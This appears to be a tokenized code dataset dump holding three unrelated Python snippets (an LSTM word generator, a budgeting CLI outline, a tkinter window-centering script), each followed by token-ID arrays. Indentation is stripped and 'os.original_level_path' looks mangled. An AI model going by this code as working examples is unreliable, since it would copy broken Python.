model.add(LSTM(512, return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(len(words)))
#model.add(Dense(1000))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
if os.original_level_path.isfile('GoTweights'):
model.load_weights('GoTweights')
# train the model, output generated text after each iteration
for iteration in range(1, 300):
print()
print('-' * 50)
print('Iteration', iteration)
model.fit(X, y, batch_size=64, nb_epoch=2)
#model.save_weights('GoTweights',overwrite=True)
start_index = random.randint(0, len(list_words) - maxlen - 1)
predictionText = open(result_path + os.original_level_path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
loop_range = [1.0,1.2]
for diversity in loop_range:
print()
print('----- diversity:', diversity)
generated = ''
sentence = list_words[start_index: start_index + maxlen]
generated += ' '.join(sentence)
print('----- Generating with seed: "' , sentence , '"')
print()
sys.stdout.write(generated)
print()
for i in range(1024):
x = np.zeros((1, maxlen, len(words)))
for t, word in enumerate(sentence):
x[0, t, word_indices[word]] = 1.
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, diversity)
next_word = indices_word[next_index]
generated += next_word
predictionText.write(next_word+"\n")
del sentence[0]
sentence.append(next_word)
sys.stdout.write(' ')
sys.stdout.write(next_word)
sys.stdout.flush()
print()
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
6738,
41927,
292,
13,
27530,
1330,
24604,
1843,
198,
6738,
41927,
292,
13,
75,
6962,
13,
7295,
1330,
360,
1072,
11,
13144,
341,
11,
14258,
448,
198,
6738,
41927,
292,
13,
75,
... | 2.213536 | 1,714 |
# CLI
#
# Commands:
# - transactions import <json>
# - transaction show (?)
# - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
# Shows balance, average in aggregation method, between two dates
# - account graph [name] [date-from] [date-to] [aggregation:...]
# - budget import <json>
# - budget show [name] [account]
# Shows progress & summary of a named budget
# - budget project [name] [unit] [aggregation:...]
import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs
# TODO: maybe load format from a config file?
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| [
2,
43749,
198,
2,
198,
2,
49505,
25,
198,
2,
220,
220,
532,
8945,
1330,
1279,
17752,
29,
198,
2,
220,
220,
532,
8611,
905,
357,
10091,
198,
2,
220,
220,
532,
1848,
905,
685,
3672,
60,
685,
4475,
12,
6738,
60,
685,
4475,
12,
14... | 2.927966 | 236 |
from tkinter import *
from tkinter import ttk
from functools import partial
# Generate main window
root = Tk()
gui = Application(root)
# Necessary for winfo_width and winfo_heigh to work properly
root.update()
""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height
# Gets the requested values of the height and widht.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()
# Gets both half the screen width/height and window width/height
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)
# Positions the window in the center of the page.
root.geometry("+{}+{}".format(positionRight, positionDown))
root.mainloop() | [
6738,
256,
74,
3849,
1330,
1635,
198,
6738,
256,
74,
3849,
1330,
256,
30488,
198,
6738,
1257,
310,
10141,
1330,
13027,
628,
628,
198,
2,
2980,
378,
1388,
4324,
198,
15763,
796,
309,
74,
3419,
198,
48317,
796,
15678,
7,
15763,
8,
198... | 3.072414 | 290 |